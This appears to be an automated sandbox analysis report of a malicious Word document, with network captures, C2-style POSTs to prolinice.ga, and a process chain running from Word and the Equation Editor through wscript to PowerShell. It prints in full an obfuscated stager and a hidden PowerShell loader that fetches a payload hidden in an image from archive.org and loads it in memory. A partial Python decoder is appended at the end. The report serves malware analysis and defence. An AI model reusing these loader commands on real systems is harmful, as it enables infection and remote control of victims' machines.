Aug 31, 2024 19:25:09.426656961 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Sat, 31 Aug 2024 17:25:09 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Thu, 29 Aug 2024 23:16:31 GMT
ETag: "c558-620daaa44438d"
Accept-Ranges: bytes
Content-Length: 50520
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
                                                    Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                    Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Aug 31, 2024 19:25:09.426676989 CEST | 1236 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Aug 31, 2024 19:25:09.426681995 CEST | 1236 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Aug 31, 2024 19:25:09.426752090 CEST | 1236 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Aug 31, 2024 19:25:09.426758051 CEST | 896 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Aug 31, 2024 19:25:09.426764011 CEST | 1236 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Aug 31, 2024 19:25:09.426769018 CEST | 1236 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Aug 31, 2024 19:25:09.426774979 CEST | 1236 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Aug 31, 2024 19:25:09.427326918 CEST | 1236 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Aug 31, 2024 19:25:09.427340984 CEST | 1236 | IN | Data Raw: 6c 5a 79 54 62 67 51 4c 70 31 54 70 51 41 53 4c 56 30 71 35 76 55 47 64 62 51 77 58 72 48 30 61 65 56 52 48 75 4e 43 45 68 30 53 4c 74 30 31 61 72 30 53 51 72 33 55 4c 74 75 36 42 64 73 42 76 6f 43 74 48 52 72 74 48 65 34 4b 65 30 6a 62 42 6a 56
                                                    Data Ascii: lZyTbgQLp1TpQASLV0q5vUGdbQwXrH0aeVRHuNCEh0SLt01ar0SQr3ULtu6BdsBvoCtHRrtHe4Ke0jbBjVxWTNmJ1oI1zvvEjNBetsVLskcbyjTWj/12ZNmXbh1Ysh30idRtRU5F+iTIV09k9ylxZG/mlwYHtcWCb1SNSEAF9KZ/G8tEjbZZdMbl7AWQdwSLj0BuVkpll8ZFsMyab06YrM4KiWQHwU2K25QJN0VLFG0SkHbJjNx
Aug 31, 2024 19:25:09.432010889 CEST | 1236 | IN | Data Raw: 75 46 33 6e 62 47 66 73 55 37 61 37 42 4c 79 49 38 31 36 5a 57 4a 34 79 66 4b 70 77 55 32 43 54 34 55 4a 79 68 4e 58 44 32 34 55 4c 6a 51 59 54 32 50 43 2b 65 75 62 46 39 6d 41 42 6c 30 58 53 5a 74 2f 74 44 48 4d 42 35 46 7a 61 5a 48 4d 45 34 4f
                                                    Data Ascii: uF3nbGfsU7a7BLyI816ZWJ4yfKpwU2CT4UJyhNXD24ULjQYT2PC+eubF9mABl0XSZt/tDHMB5FzaZHME4OQYzeX7mR7KE16MXoKPXPXCDcDyGOhEjnvo+P+VEGtZwd1soPW6bkW8SMGTFjDMfNFVCNYVWOw3Ge+bAQXeS7yD0Ar2GO+LC76jCfnM3xy7TMQwjezhF8++kOi1i2ulrsn7jN46zEuv2bzTGmatYxQa2E6cJCHsklf


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.2249166185.251.91.119801244C:\Windows\explorer.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 31, 2024 19:25:32.075747013 CEST277OUTPOST /index.php HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://cpbrvhywlnsy.com/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Length: 275
                                                    Host: prolinice.ga
                                                    Aug 31, 2024 19:25:33.084430933 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    date: Sat, 31 Aug 2024 17:25:32 GMT
                                                    server: Apache/2.4.59 (Debian)
                                                    transfer-encoding: chunked
                                                    content-type: text/html; charset=utf-8


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    3 | 192.168.2.22 | 49167 | 185.251.91.119 | 80 | 4056 | C:\Windows\SysWOW64\explorer.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 31, 2024 19:25:39.893795967 CEST | 274 | OUT | POST /index.php HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://prolinice.ga/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Length: 1395
                                                    Host: prolinice.ga
                                                    Aug 31, 2024 19:25:40.927783012 CEST | 565 | IN | HTTP/1.1 404 Not Found
                                                    date: Sat, 31 Aug 2024 17:25:40 GMT
                                                    server: Apache/2.4.59 (Debian)
                                                    content-length: 409
                                                    content-type: text/html; charset=utf-8
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    4 | 192.168.2.22 | 49168 | 185.251.91.119 | 80 | 1244 | C:\Windows\explorer.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 31, 2024 19:26:52.623749971 CEST | 280 | OUT | POST /index.php HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://wehtwifahcxeheu.com/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Length: 109
                                                    Host: prolinice.ga
                                                    Aug 31, 2024 19:26:53.625802994 CEST | 161 | IN | HTTP/1.1 404 Not Found
                                                    date: Sat, 31 Aug 2024 17:26:53 GMT
                                                    server: Apache/2.4.59 (Debian)
                                                    content-length: 7
                                                    content-type: text/html; charset=utf-8
                                                    Data Raw: 03 00 00 00 a0 5f e8
                                                    Data Ascii: _
                                                    Aug 31, 2024 19:26:53.834259033 CEST | 161 | IN | HTTP/1.1 404 Not Found
                                                    date: Sat, 31 Aug 2024 17:26:53 GMT
                                                    server: Apache/2.4.59 (Debian)
                                                    content-length: 7
                                                    content-type: text/html; charset=utf-8
                                                    Data Raw: 03 00 00 00 a0 5f e8
                                                    Data Ascii: _


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    0 | 192.168.2.22 | 49164 | 207.241.232.154 | 443 | 3628 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-08-31 17:25:07 UTC | 111 | OUT | GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1
                                                    Host: ia803104.us.archive.org
                                                    Connection: Keep-Alive
                                                    2024-08-31 17:25:07 UTC | 591 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.24.0 (Ubuntu)
                                                    Date: Sat, 31 Aug 2024 17:25:07 GMT
                                                    Content-Type: image/jpeg
                                                    Content-Length: 1931225
                                                    Last-Modified: Fri, 26 Jul 2024 21:52:52 GMT
                                                    Connection: close
                                                    ETag: "66a41ab4-1d77d9"
                                                    Strict-Transport-Security: max-age=15724800
                                                    Expires: Sat, 31 Aug 2024 23:25:07 GMT
                                                    Cache-Control: max-age=21600
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                    Access-Control-Allow-Credentials: true
                                                    Accept-Ranges: bytes



                                                    Target ID:0
                                                    Start time:13:24:57
                                                    Start date:31/08/2024
                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                    Imagebase:0x13f1e0000
                                                    File size:1'423'704 bytes
                                                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:1
                                                    Start time:13:24:58
                                                    Start date:31/08/2024
                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                    Imagebase:0x400000
                                                    File size:543'304 bytes
                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:13:25:01
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs"
                                                    Imagebase:0x310000
                                                    File size:141'824 bytes
                                                    MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:13:25:01
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated encoded payload omitted]'
? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? 
?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBW? ? ? ? ?EY? ? ? ? ?RQBX? ? ? ? ?C8? ? ? ? ?M? ? ? ? ?? ? ? ? ?5? ? ? ? ?C8? ? ? ? ?Ng? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?O? ? ? ? ?? ? ? ? ?0? ? ? ? ?DE? ? ? ? ?Lg? ? ? ? ?0? ? ? ? ?Dk? ? ? ? ?Lg? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?Lw? ? ? ? ?v? ? ? ? ?Do? ? ? ? ?c? ? ? ? ?B0? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBS? ? ? ? ?GU? ? ? ? ?ZwBB? ? ? ? ?HM? ? ? ? ?bQ? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?Jw? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?KQ? ? ? ? ?=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                    Imagebase:0x1080000
                                                    File size:427'008 bytes
                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:13:25:04
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                                    Imagebase:0x1080000
                                                    File size:427'008 bytes
                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true
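The two powershell.exe command lines above form a two-stage loader: the first carries its script in $Codigo as base64 of UTF-16LE text in which every 'A' of the base64 alphabet was swapped for a filler token, restores the 'A' with .replace() and re-invokes PowerShell on the result; the second downloads 'vbs.jpg' from archive.org, carves the base64 between <<BASE64_START>> and <<BASE64_END>>, hands the decoded bytes to Assembly.Load and calls dnlib.IO.Home.VAI with a reversed string as its first argument. The Python below is an added example, not part of this report and not code from the sample, that reproduces those steps offline so the stages can be decoded without executing them. Assumptions: the filler token is taken exactly as this report renders it ('? ? ? ? ?'; the original bytes may be non-ASCII), the vbs.jpg stand-in is constructed here, and the MZ sanity check is the example's own addition. The only real data used are the first 32 characters of $Codigo and the VAI argument string, both copied from the command lines above.

```python
import base64
from typing import Optional

# --- Stage 1: the $Codigo blob in the first powershell.exe command line ---
# base64(UTF-16LE script) with every 'A' replaced by a filler token; the
# one-liner restores it with .replace(<token>, 'A') before decoding.
STAGE1_FILLER = "? ? ? ? ?"   # as rendered in this report (assumption)

# First 32 base64 characters of $Codigo, copied from the report with the
# filler still in place, to check the decoder against real input.
REPORT_PREFIX = ("J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?"
                 "VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?"
                 "C? ? ? ? ?? ? ? ? ?")


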